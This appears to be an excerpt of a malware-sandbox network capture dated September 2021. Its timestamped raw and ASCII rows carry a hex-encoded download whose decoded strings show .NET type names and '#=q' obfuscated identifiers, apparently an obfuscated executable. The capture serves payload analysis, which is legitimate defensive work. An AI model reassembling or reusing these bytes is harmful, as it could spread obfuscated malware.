2021-09-14 15:02:51 UTC	55	IN	Data Raw: 2d 2d 2d 2d 36 32 38 46 36 2d 2d 2d 2d 2d 36 32 38 46 2d 2d 2d 2d 2d 2d 36 32 38 45 46 2d 2d 2d 2d 2d 36 36 31 32 38 45 45 2d 2d 2d 2d 2d 36 32 41 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 32 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 31 38 32 44 31 38 32 36 2d 33 31 35 31 45 32 44 31 35 32 36 32 2d 34 41 44 38 44 39 35 33 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 35 39 36 31 32 41 32 36 32 42 45 36 32 36 32 42 45 39 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 37 32 44 32 37 32 36 32 2d 38 44 46 43 42 33 34 45 36 36 36 35 36 36 36 35 36 36 36 36 36 35 36 35 36 36 35 39 2d 33 31 37 31 43 32 44 31 35 32 36 32 2d 45 46 44 37 46 35 43 31 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 Data Ascii: ----628F6-----628F------628EF-----66128EE-----62A-----33--A--23---------------218182D1826-3151E2D15262-4AD8D95366666565666665666559612A262BE6262BE9---33--A--32---------------21C172D27262-8DFCB34E66656665666665656659-3171C2D15262-EFD7F5C1666665656666656665
2021-09-14 15:02:51 UTC	62	IN	Data Raw: 32 37 42 36 33 2d 2d 2d 2d 2d 34 2d 36 2d 33 2d 36 35 39 36 46 35 43 2d 31 2d 2d 2d 41 2d 42 2d 37 32 44 2d 36 2d 32 32 38 2d 34 2d 31 2d 2d 2d 36 2d 36 2d 37 35 38 2d 41 2d 36 2d 33 33 32 44 39 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 33 35 2d 2d 2d 2d 2d 2d 36 46 2d 2d 2d 2d 31 31 2d 32 37 42 36 32 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 2d 32 31 34 31 36 32 43 2d 41 32 36 32 36 2d 36 32 43 31 32 32 42 2d 41 2d 41 32 42 46 31 37 44 36 32 2d 2d 2d 2d 2d 34 32 42 46 31 2d 36 36 46 37 39 2d 2d 2d 2d 2d 41 2d 32 31 34 31 44 32 44 2d 33 32 36 32 36 32 41 37 44 36 33 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 36 35 2d 2d 2d 2d 2d 2d 37 2d 2d 2d 2d 2d 31 31 2d 33 31 36 32 46 2d 36 37 33 35 44 2d 31 2d 2d 2d 41 37 41 2d 33 38 44 32 32 Data Ascii: 27B63-----4-6-3-6596F5C-1---A-B-72D-6-228-4-1---6-6-758-A-6-332D92A--133--3--35------6F----11-27B62-----41A2D-D26-214162C-A2626-62C122B-A-A2BF17D62-----42BF1-66F79-----A-2141D2D-326262A7D63-----42BF8------133--6--65------7-----11-3162F-6735D-1---A7A-38D22
2021-09-14 15:02:51 UTC	69	IN	Data Raw: 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 44 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 44 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 45 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 45 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 43 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 46 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 33 32 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 2d 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 31 46 2d 2d 2d 2d 31 42 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 31 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 34 38 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d Data Ascii: F6D-1---A7E76-----4D-BD-----12846-----A1F-D6F6D-1---A7E76-----4D-BE-----12846-----A1F-E6F6D-1---A7E76-----4D-BC-----12846-----A1F-F6F6D-1---A7E76-----4D-32-----12846-----A1F1-6F6D-1---A7E76-----4D-1F----1B2846-----A1F116F6D-1---A7E76-----4D-48-----12846--
2021-09-14 15:02:51 UTC	76	IN	Data Raw: 33 2d 37 2d 33 37 42 31 35 2d 2d 2d 2d 2d 34 31 31 2d 37 32 2d 39 39 32 43 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 42 33 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 36 46 39 37 34 31 31 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 32 36 2d 2d 2d 2d 2d 2d 34 36 2d 2d 2d 2d 2d 31 31 33 33 2d 2d 34 2d 2d 35 33 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 31 31 31 36 37 45 33 41 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 41 31 37 35 39 31 39 32 44 2d 37 32 36 31 41 32 44 2d 36 32 36 32 42 33 36 2d 43 32 42 46 37 2d 42 32 42 46 38 37 45 33 41 2d 2d 2d 2d 2d 34 2d 37 36 46 41 45 2d 31 2d 2d 2d 41 37 42 31 31 2d 2d 2d 2d 2d 34 2d 32 32 38 36 2d 2d 31 2d 2d 2d 41 32 43 2d 43 Data Ascii: 3-7-37B15-----411-72-992CD-1E28FF-----628B3-----62861-----ADE--2A6F97411C--------------------3B-2----3B-2----26------46-----1133--4--53------8-----11167E3A-----46FAD-1---A1759192D-7261A2D-6262B36-C2BF7-B2BF87E3A-----4-76FAE-1---A7B11-----4-2286--1---A2C-C
2021-09-14 15:02:51 UTC	84	IN	Data Raw: 34 33 46 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 35 2d 2d 2d 2d 2d 34 2d 33 32 38 38 36 2d 2d 2d 2d 2d 41 37 34 33 46 2d 2d 2d 2d 2d 32 31 41 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 38 35 2d 2d 2d 2d 2d 41 37 34 33 43 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 36 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 Data Ascii: 43F-----21C2D-326262A7D95-----42BF8---33--9--1F---------------2-27B95-----4-32886-----A743F-----21A2D-326262A7D95-----42BF8---33--9--1F---------------2-27B96-----4-32885-----A743C-----21C2D-326262A7D96-----42BF8---33--9--1F---------------2-27B96-----4-328
2021-09-14 15:02:51 UTC	91	IN	Data Raw: 45 2d 31 2d 2d 2d 41 2d 32 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 36 35 38 31 39 32 44 31 37 32 36 32 36 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 38 45 42 37 33 33 35 41 32 42 2d 41 2d 41 32 42 43 39 37 44 42 31 2d 2d 2d 2d 2d 34 32 42 45 34 2d 32 37 42 39 37 2d 2d 2d 2d 2d 34 31 37 32 44 2d 36 32 36 2d 39 32 43 31 32 32 42 2d 33 2d 44 32 42 46 38 2d 39 2d 32 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 36 2d 32 31 36 31 41 32 44 31 45 32 36 32 36 2d 32 37 43 42 34 2d 2d 2d 2d 2d 34 31 36 32 38 2d 36 2d 2d 2d 2d 32 42 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 41 2d 2d 2d 2d 2d 2d 34 33 32 2d 45 32 42 2d 37 37 44 42 38 2d 2d 2d 2d 2d 34 32 42 44 44 32 38 45 37 2d 31 2d 2d 2d 41 2d 36 2d 35 2d 34 35 39 Data Ascii: E-1---A-2-27BB1-----4-658192D172626-27BB1-----4-27BB4-----48EB7335A2B-A-A2BC97DB1-----42BE4-27B97-----4172D-626-92C122B-3-D2BF8-9-2-27BB4-----46FAD-1---6-2161A2D1E2626-27CB4-----41628-6----2B-27BB1-----4-27BA------432-E2B-77DB8-----42BDD28E7-1---A-6-5-459
2021-09-14 15:02:51 UTC	98	IN	Data Raw: 42 35 34 42 43 43 41 43 35 31 33 37 41 44 42 44 45 38 37 44 44 35 42 36 31 39 37 36 34 38 41 43 34 37 42 34 38 36 35 38 31 34 42 42 46 41 33 32 2d 38 44 31 33 41 41 44 35 43 37 31 45 37 2d 46 41 42 36 46 36 33 32 43 45 33 43 31 38 37 46 45 45 45 43 39 35 34 42 42 46 41 33 45 39 44 45 36 35 2d 35 45 38 34 42 42 46 41 33 37 36 34 37 34 45 38 42 32 43 43 31 42 39 46 35 34 42 42 46 41 33 46 46 44 43 36 34 41 34 43 39 39 37 35 41 43 36 45 39 45 46 42 31 43 44 38 33 33 43 39 46 43 42 36 37 35 42 44 31 38 37 45 37 44 46 34 42 42 46 41 33 43 42 43 43 31 46 39 39 33 45 42 45 36 37 42 39 37 2d 46 43 37 37 39 38 31 2d 32 44 41 31 41 37 31 39 33 44 38 2d 31 37 41 37 39 2d 38 36 34 35 45 36 46 43 32 37 34 42 42 46 41 33 37 42 41 42 35 2d 34 46 44 2d 2d 35 39 42 43 38 Data Ascii: B54BCCAC5137ADBDE87DD5B6197648AC47B4865814BBFA32-8D13AAD5C71E7-FAB6F632CE3C187FEEEC954BBFA3E9DE65-5E84BBFA376474E8B2CC1B9F54BBFA3FFDC64A4C9975AC6E9EFB1CD833C9FCB675BD187E7DF4BBFA3CBCC1F993EBE67B97-FC77981-2DA1A7193D8-17A79-8645E6FC274BBFA37BAB5-4FD--59BC8
2021-09-14 15:02:52 UTC	105	IN	Data Raw: 36 2d 36 2d 2d 31 31 2d 37 34 44 2d 36 2d 36 2d 2d 31 38 2d 37 34 44 2d 36 2d 36 2d 2d 32 35 2d 37 34 44 2d 36 2d 36 2d 2d 33 2d 2d 37 35 39 2d 2d 2d 36 2d 2d 33 35 2d 37 35 39 2d 2d 31 32 2d 2d 34 37 2d 37 34 42 2d 37 31 32 2d 2d 35 36 2d 37 34 42 2d 37 31 32 2d 2d 35 46 2d 37 34 42 2d 37 31 32 2d 2d 36 39 2d 37 34 42 2d 37 31 32 2d 2d 37 34 2d 37 34 42 2d 37 31 32 2d 2d 38 2d 2d 37 38 45 2d 37 31 32 2d 2d 41 31 2d 37 38 45 2d 37 31 32 2d 2d 41 45 2d 37 38 45 2d 37 31 32 2d 2d 42 42 2d 37 38 45 2d 37 31 32 2d 2d 43 32 2d 37 38 45 2d 37 31 32 2d 2d 44 37 2d 37 38 45 2d 37 31 32 2d 2d 45 43 2d 37 38 45 2d 37 31 32 2d 2d 46 38 2d 37 38 45 2d 37 31 32 2d 2d 2d 38 2d 38 38 45 2d 37 2d 36 2d 2d 31 33 2d 38 35 39 2d 2d 2d 36 2d 2d 31 41 2d 38 35 39 2d 2d 2d 36 Data Ascii: 6-6--11-74D-6-6--18-74D-6-6--25-74D-6-6--3--759---6--35-759--12--47-74B-712--56-74B-712--5F-74B-712--69-74B-712--74-74B-712--8--78E-712--A1-78E-712--AE-78E-712--BB-78E-712--C2-78E-712--D7-78E-712--EC-78E-712--F8-78E-712---8-88E-7-6--13-859---6--1A-859---6
2021-09-14 15:02:52 UTC	113	IN	Data Raw: 2d 35 37 32 36 33 32 2d 31 32 35 2d 2d 46 38 32 44 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 41 42 32 36 36 37 2d 2d 32 37 2d 2d 32 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 44 42 32 36 36 37 2d 2d 32 37 2d 2d 36 2d 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 31 38 46 33 31 41 44 45 2d 2d 32 37 2d 2d 38 34 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 42 34 33 32 37 33 39 2d 31 32 38 2d 2d 39 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 35 31 32 37 2d 35 2d 31 32 38 2d 2d 44 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 37 37 32 37 33 44 2d 31 32 39 2d 2d 46 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 39 45 32 37 36 37 2d 2d 32 41 2d 2d 2d 38 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 41 39 32 37 34 32 2d 31 32 41 2d 2d 38 43 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 2d 41 Data Ascii: -572632-125--F82D---------6--AB2667--27--2C2E---------6--DB2667--27--6-2E---------618F31ADE--27--842E--------66-B432739-128--9C2E--------66-35127-5-128--DC2E--------66-377273D-129--FC2E--------66-39E2767--2A---82F--------66-3A92742-12A--8C2F--------66-3-A
2021-09-14 15:02:52 UTC	120	IN	Data Raw: 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 42 31 37 41 33 43 2d 32 33 31 2d 31 36 34 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 46 35 37 41 33 43 2d 32 33 31 2d 31 39 2d 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 33 39 37 42 33 43 2d 32 33 31 2d 31 42 43 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 37 44 37 42 46 39 2d 33 33 31 2d 31 45 38 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 41 44 37 42 46 39 2d 33 33 31 2d 31 31 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 44 44 37 42 46 39 2d 33 33 31 2d 31 34 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 2d 44 37 43 46 39 2d 33 33 31 2d 31 37 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 35 31 37 43 46 39 2d 33 33 31 2d 31 41 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 39 35 37 43 46 39 2d 33 33 31 2d 31 44 38 41 34 2d 2d Data Ascii: 3--------16--B17A3C-231-164A3--------16--F57A3C-231-19-A3--------16--397B3C-231-1BCA3--------16--7D7BF9-331-1E8A3--------16--AD7BF9-331-118A4--------16--DD7BF9-331-148A4--------16---D7CF9-331-178A4--------16--517CF9-331-1A8A4--------16--957CF9-331-1D8A4--
2021-09-14 15:02:52 UTC	127	IN	Data Raw: 2d 2d 44 36 46 2d 2d 2d 2d 2d 31 2d 2d 35 39 36 46 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 2d 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 2d 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 44 39 37 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 33 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 31 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 31 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 31 2d 2d 2d 2d 2d 31 2d 2d 46 35 37 31 2d 2d 2d 2d 2d 32 2d 2d 31 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 2d 31 35 38 2d 2d 2d 2d 2d 31 2d 2d 34 39 37 32 2d 2d 2d 2d 2d 31 2d 2d 36 35 37 32 2d 2d 2d 2d 2d 32 2d 2d 38 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 43 39 37 33 2d 2d 2d 2d 2d 31 2d 2d 2d 31 37 34 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 34 2d 2d 2d 2d 2d 31 2d 2d 38 35 Data Ascii: --D6F-----1--596F-----1--4D7------1--857------1--A17------2--BD7------1--D97------2---971-----1--3971-----1--8571-----1--A171-----2--BD71-----1--F571-----2--1172-----1---158-----1--4972-----1--6572-----2--8172-----1--C973-----1---174-----1--4D74-----1--85
2021-09-14 15:02:52 UTC	134	IN	Data Raw: 2d 44 38 41 39 33 41 2d 41 36 43 2d 2d 39 44 41 39 39 43 2d 2d 36 43 2d 2d 39 37 41 41 33 2d 2d 46 31 39 2d 36 46 33 31 41 32 45 31 33 34 39 2d 2d 46 33 31 41 36 37 2d 2d 46 39 2d 35 46 33 31 41 43 43 31 32 37 31 2d 35 46 33 31 41 39 38 2d 31 37 31 2d 35 45 38 31 43 41 36 2d 2d 32 31 2d 35 46 33 31 41 42 41 31 33 41 31 2d 34 46 33 31 41 43 34 31 33 44 39 2d 34 46 35 42 31 44 35 31 33 44 31 2d 34 2d 41 42 32 44 42 31 33 42 39 2d 34 46 33 31 41 46 35 31 33 41 39 2d 34 31 34 42 32 39 43 2d 2d 41 39 2d 34 32 35 42 32 46 43 31 33 44 31 2d 34 46 33 31 41 46 43 31 33 44 39 2d 34 46 33 31 41 2d 33 31 34 43 39 2d 34 31 34 42 32 39 43 2d 2d 43 39 2d 34 32 35 42 32 46 43 31 33 35 39 2d 35 37 46 41 39 35 36 2d 34 37 31 2d 35 46 33 31 41 36 37 2d 2d 37 31 2d 35 33 33 Data Ascii: -D8A93A-A6C--9DA99C--6C--97AA3--F19-6F31A2E1349--F31A67--F9-5F31ACC1271-5F31A98-171-5E81CA6--21-5F31ABA13A1-4F31AC413D9-4F5B1D513D1-4-AB2DB13B9-4F31AF513A9-414B29C--A9-425B2FC13D1-4F31AFC13D9-4F31A-314C9-414B29C--C9-425B2FC1359-57FA956-471-5F31A67--71-533
2021-09-14 15:02:52 UTC	141	IN	Data Raw: 42 34 36 37 32 36 31 36 44 36 35 2d 2d 35 33 37 34 36 31 36 33 36 42 35 34 37 32 36 31 36 33 36 35 2d 2d 34 34 36 46 37 35 36 32 36 43 36 35 2d 2d 35 32 36 35 36 33 37 34 36 31 36 45 36 37 36 43 36 35 2d 2d 35 33 36 39 37 41 36 35 2d 2d 34 35 36 45 37 35 36 44 2d 2d 34 35 36 45 37 36 36 39 37 32 36 46 36 45 36 44 36 35 36 45 37 34 2d 2d 35 33 37 2d 36 35 36 33 36 39 36 31 36 43 34 36 36 46 36 43 36 34 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 31 37 32 36 37 37 33 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 2d 2d 34 35 37 36 36 35 36 45 37 34 34 38 36 31 36 45 36 34 36 43 36 35 37 32 36 2d 33 31 2d 2d 34 35 37 38 36 33 36 35 37 2d 37 34 36 39 36 46 36 45 2d 2d 34 37 34 33 2d 2d 34 37 37 35 36 39 36 34 2d 2d 34 39 Data Ascii: B4672616D65--537461636B5472616365--446F75626C65--52656374616E676C65--53697A65--456E756D--456E7669726F6E6D656E74--537-656369616C466F6C646572--4576656E7441726773--4576656E7448616E646C6572--4576656E7448616E646C65726-31--457863657-74696F6E--4743--47756964--49
2021-09-14 15:02:52 UTC	149	IN	Data Raw: 36 34 39 37 37 33 37 34 34 37 33 36 38 36 37 34 45 35 37 34 37 37 36 36 35 34 31 37 36 34 32 35 31 33 44 2d 2d 32 33 33 44 37 31 36 38 34 35 33 32 35 2d 33 32 36 42 33 34 33 36 36 41 36 39 35 33 35 33 36 41 34 46 33 38 33 36 36 37 33 33 36 45 34 32 33 31 34 44 36 42 34 43 34 37 34 33 33 39 35 46 33 33 36 31 37 36 34 34 37 2d 34 39 33 37 36 39 35 39 36 32 35 35 34 38 37 32 33 35 36 37 33 44 2d 2d 32 33 33 44 37 31 37 36 35 38 32 34 34 41 33 32 33 34 37 32 34 39 33 2d 36 35 34 41 33 2d 36 37 35 37 36 36 34 31 33 36 34 33 34 35 36 34 37 41 35 36 34 41 34 45 33 37 36 32 35 31 34 45 35 46 35 39 35 34 37 35 35 33 33 39 33 38 34 45 33 2d 37 39 37 39 34 44 35 39 35 2d 36 46 33 44 2d 2d 32 33 33 44 37 31 33 36 34 45 36 35 36 45 36 36 35 31 36 32 37 41 35 31 35 39 Data Ascii: 6497737447368674E57477665417642513D--233D716845325-326B34366A6953536A4F383667336E42314D6B4C4743395F336176447-493769596255487235673D--233D717658244A323472493-654A3-67576641364345647A564A4E3762514E5F5954755339384E3-79794D595-6F3D--233D71364E656E6651627A5159
2021-09-14 15:02:52 UTC	156	IN	Data Raw: 33 33 37 35 46 37 41 34 43 34 33 34 45 36 34 34 36 34 33 36 39 34 38 37 34 35 2d 34 38 33 31 37 39 35 32 33 39 33 38 37 37 33 37 35 34 36 32 36 44 37 32 35 33 33 34 37 36 35 35 34 35 33 44 2d 2d 34 35 36 45 36 34 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 33 39 33 35 37 37 33 39 34 44 37 2d 36 31 34 37 33 34 35 41 36 33 36 37 36 42 34 37 36 37 36 45 36 44 35 31 34 39 35 34 34 46 36 34 34 38 37 32 33 35 34 39 36 31 34 43 35 38 34 34 33 38 36 31 34 33 33 36 36 46 33 33 34 35 37 31 37 34 34 35 33 2d 35 2d 35 31 33 44 2d 2d 34 39 36 45 37 36 36 46 36 42 36 35 2d 2d 32 33 33 44 37 31 37 38 37 2d 33 36 36 33 37 34 33 34 34 41 34 37 34 43 36 31 34 44 34 34 36 32 37 37 36 37 33 36 36 36 36 42 37 32 34 39 34 35 37 37 33 44 33 44 2d 2d 32 33 33 44 Data Ascii: 3375F7A4C434E6446436948745-483179523938773754626D7253347655453D--456E64496E766F6B65--233D71393577394D7-6147345A63676B47676E6D5149544F6448723549614C5844386143366F33457174453-5-513D--496E766F6B65--233D71787-366374344A474C614D4462776736666B724945773D3D--233D
2021-09-14 15:02:52 UTC	163	IN	Data Raw: 36 36 37 33 44 33 44 2d 2d 34 35 36 45 37 34 37 32 37 39 34 35 37 38 36 39 37 33 37 34 37 33 2d 2d 34 37 36 35 37 34 34 35 36 45 37 34 37 32 36 39 36 35 37 33 2d 2d 32 33 33 44 37 31 33 32 36 37 37 34 36 38 37 36 34 32 33 36 33 32 36 45 33 2d 33 37 36 36 35 39 35 36 35 34 37 38 33 35 36 36 37 37 34 39 37 31 37 38 34 32 34 31 36 46 33 31 37 34 35 46 36 38 37 33 32 34 36 39 36 43 33 39 34 31 36 33 32 34 33 34 34 36 35 39 35 46 34 37 37 37 33 44 2d 2d 32 33 33 44 37 31 37 32 33 35 37 31 37 2d 37 36 34 46 35 2d 36 45 34 43 37 38 34 43 37 2d 33 36 36 31 34 37 36 42 36 36 34 31 34 44 33 37 37 37 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 36 33 35 37 41 36 45 34 36 36 37 33 2d 35 46 33 32 33 33 33 34 36 45 36 36 36 45 36 38 34 43 33 34 34 39 33 38 37 39 35 32 Data Ascii: 6673D3D--456E747279457869737473--476574456E7472696573--233D7132677468764236326E3-37665956547835667749717842416F31745F687324696C394163243446595F47773D--233D717235717-764F5-6E4C784C7-3661476B66414D3777513D3D--233D7136357A6E46673-5F3233346E666E684C3449387952
2021-09-14 15:02:52 UTC	170	IN	Data Raw: 37 34 44 33 33 36 44 34 46 37 36 36 36 37 34 37 32 37 37 33 44 2d 2d 32 33 33 44 37 31 36 42 36 33 35 36 36 42 34 41 37 33 36 42 37 35 34 37 34 31 33 34 36 46 33 37 36 42 34 37 37 35 34 45 33 37 33 39 36 39 33 31 37 37 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 33 33 34 39 37 34 36 34 33 31 34 35 34 43 34 34 35 2d 34 38 34 41 37 38 36 38 34 43 37 36 37 34 33 2d 37 39 33 31 34 45 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 35 38 36 42 36 37 37 2d 36 36 36 37 36 38 37 36 35 34 34 42 34 34 35 41 34 37 36 43 35 38 34 32 34 37 34 39 33 34 37 38 33 39 37 36 36 35 35 31 34 46 33 34 34 41 36 36 36 41 34 36 33 37 34 37 35 37 33 32 34 35 34 33 37 37 33 39 32 34 34 43 33 33 34 35 37 36 37 39 34 42 35 41 34 37 34 46 36 45 37 41 36 39 37 37 35 38 34 35 33 32 35 38 37 32 Data Ascii: 74D336D4F76667472773D--233D716B63566B4A736B754741346F376B47754E37396931773D3D--233D71643349746431454C445-484A78684C76743-79314E513D3D--233D71586B677-66676876544B445A476C584247493478397665514F344A666A463747573245437739244C334576794B5A474F6E7A69775845325872
2021-09-14 15:02:52 UTC	178	IN	Data Raw: 2d 34 32 35 32 34 41 36 34 34 31 37 33 35 39 36 43 35 38 35 33 35 32 35 35 36 33 37 37 36 39 37 41 37 37 33 44 2d 2d 32 33 33 44 37 31 36 46 37 36 36 33 33 2d 34 41 33 37 34 42 33 36 36 32 33 39 34 35 37 31 35 46 34 33 33 2d 34 42 33 34 33 36 37 32 36 32 36 44 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 37 36 36 32 35 34 34 45 34 32 36 39 36 38 34 37 33 32 37 41 34 31 35 32 37 33 36 35 37 37 36 42 35 32 34 39 34 36 35 34 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 33 35 36 41 33 33 37 37 37 36 34 41 35 38 36 43 36 45 37 32 34 37 36 44 35 32 36 45 34 42 35 35 34 38 37 32 35 46 33 31 35 33 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 34 35 34 39 35 2d 36 33 36 45 36 34 34 46 34 43 37 32 35 36 33 32 34 37 34 41 36 44 36 45 36 46 33 37 37 41 34 42 37 34 34 32 Data Ascii: -42524A644173596C585352556377697A773D--233D716F76633-4A374B36623945715F433-4B343672626D673D3D--233D717662544E42696847327A41527365776B5249465453513D3D--233D71356A3377764A586C6E72476D526E4B5548725F3153513D3D--233D7145495-636E644F4C725632474A6D6E6F377A4B7442
2021-09-14 15:02:52 UTC	185	IN	Data Raw: 37 36 41 35 46 36 37 37 34 33 31 33 32 34 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 36 34 34 39 36 44 35 2d 34 31 35 39 33 31 36 46 33 33 35 39 36 38 36 32 34 43 37 34 37 35 36 42 37 37 34 33 35 31 33 39 33 31 36 33 34 39 35 33 36 31 36 35 34 39 34 35 35 37 35 32 34 42 35 33 35 39 37 32 34 37 35 41 33 33 36 34 35 34 35 36 36 45 36 42 35 39 33 44 2d 2d 32 33 33 44 37 31 35 46 36 42 34 37 37 39 34 35 36 45 33 38 34 42 37 32 36 44 34 32 36 44 37 34 33 35 34 44 33 31 34 45 33 39 36 33 35 35 35 33 36 37 33 44 33 44 2d 2d 32 33 33 44 37 31 32 34 36 45 36 41 36 46 37 2d 35 32 37 32 35 2d 36 32 36 43 37 31 36 35 32 34 37 39 37 32 37 33 32 34 37 32 37 33 37 35 33 35 35 31 33 44 33 44 2d 2d 32 33 33 44 37 31 37 41 36 31 33 37 34 46 33 31 34 31 34 38 37 32 37 32 Data Ascii: 76A5F6774313245513D3D--233D7164496D5-4159316F335968624C74756B77435139316349536165494557524B535972475A336454566E6B593D--233D715F6B4779456E384B726D426D74354D314E39635553673D3D--233D71246E6A6F7-52725-626C7165247972732472737535513D3D--233D717A61374F3141487272
2021-09-14 15:02:52 UTC	192	IN	Data Raw: 34 35 37 37 34 33 36 36 36 35 32 36 32 36 35 35 37 36 46 37 38 33 31 37 35 34 45 33 33 37 36 36 36 35 33 35 2d 33 35 37 36 35 46 35 37 35 46 37 37 36 33 33 44 2d 2d 32 33 33 44 37 31 33 2d 35 2d 34 44 36 33 35 38 35 31 34 41 37 38 36 33 34 43 34 43 37 32 33 31 37 33 35 39 34 46 33 2d 36 36 37 2d 37 39 36 38 35 2d 36 41 35 35 37 37 36 41 35 31 37 34 34 39 36 45 34 43 35 46 37 36 34 41 35 2d 35 31 35 33 36 37 34 33 37 33 36 36 36 39 36 46 33 44 2d 2d 32 33 33 44 37 31 34 38 36 31 37 35 36 39 36 41 36 44 36 38 33 32 36 45 34 41 33 35 36 42 34 38 34 46 33 36 36 36 35 34 35 39 34 32 36 45 34 41 34 36 35 41 34 42 36 42 36 36 37 41 36 42 35 37 37 34 33 35 36 37 34 32 33 34 36 44 35 39 35 33 33 35 34 46 34 43 34 46 35 36 36 33 33 44 2d 2d 32 33 33 44 37 31 37 2d Data Ascii: 